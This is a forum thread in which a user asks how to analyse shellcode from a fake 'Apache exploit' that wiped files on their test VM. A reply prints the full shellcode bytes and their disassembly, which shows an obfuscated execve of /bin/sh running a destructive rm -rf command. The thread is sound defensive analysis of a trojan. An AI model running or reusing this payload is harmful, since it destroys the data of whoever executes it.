Jump to content

Help On Shellcode?


knives
 Share

Recommended Posts

Hello guys,

Is there an easier way to reverse engineer a shell code to know what's the payload it did? Is there a software to convert a shellcode to a much more readable output? I've seen and tried software to convert shell codes to assembly language only. Is there a better one?

As there are lots fraud hacks/exploits posted around like this one ----> http://pastebin.com/f5571e439 . Might be helpful for everyone as well.

Thanks in advance.

Link to comment
Share on other sites

The link that I mentioned says Apache exploit but if you run that exploit, it will delete your root directory. (I run it on my bt5 vmmachine) That's why i said fraud exploit/hack. And I want to know what else it did on my system that's why I want to know if there's a way to convert it to more easily traceable code other than assembly code.

Link to comment
Share on other sites

This is not smc so it is pretty easy:

$ echo -en "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80" | ndisasm -u -
00000000  B8FF2F7368        mov eax,0x68732fff
00000005  C1E808            shr eax,0x8
00000008  50                push eax
00000009  B82F62696E        mov eax,0x6e69622f
0000000E  50                push eax
0000000F  89E3              mov ebx,esp
00000011  31C0              xor eax,eax
00000013  50                push eax
00000014  66B87171          mov ax,0x7171
00000018  66355151          xor ax,0x5151
0000001C  6650              push ax
0000001E  B82337712F        mov eax,0x2f713723
00000023  3551515151        xor eax,0x51515151
00000028  50                push eax
00000029  B8233C717C        mov eax,0x7c713c23
0000002E  3551515151        xor eax,0x51515151
00000033  50                push eax
00000034  89E1              mov ecx,esp
00000036  31C0              xor eax,eax
00000038  50                push eax
00000039  66B82D63          mov ax,0x632d
0000003D  6650              push ax
0000003F  89E2              mov edx,esp
00000041  31C0              xor eax,eax
00000043  B064              mov al,0x64
00000045  29C4              sub esp,eax
00000047  31C0              xor eax,eax
00000049  50                push eax
0000004A  51                push ecx
0000004B  52                push edx
0000004C  53                push ebx
0000004D  89E1              mov ecx,esp
0000004F  31D2              xor edx,edx
00000051  31C0              xor eax,eax
00000053  B00B              mov al,0xb
00000055  CD80              int 0x80
00000057  B401              mov ah,0x1
00000059  31DB              xor ebx,ebx
0000005B  CD80              int 0x80 

Let me know if you need more help.

Link to comment
Share on other sites

what do you mean most shellcode will topically be in C?

I think you should read up on how to write shellcode.

http://www.vividmachines.com/shellcode/shellcode.html

http://projectshellcode.com/?q=node/12

http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html

I know about shell code, I have been through Offensive Security material. Thanks though.

I suspect he means that most shellcode is contained within C code for delivery.

Yes

The link that I mentioned says Apache exploit but if you run that exploit, it will delete your root directory. (I run it on my bt5 vmmachine) That's why i said fraud exploit/hack. And I want to know what else it did on my system that's why I want to know if there's a way to convert it to more easily traceable code other than assembly code.

Sometimes that is done intentionally to stop noob from just copy/paste exploit. Have to modify the code to make things work anyways.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...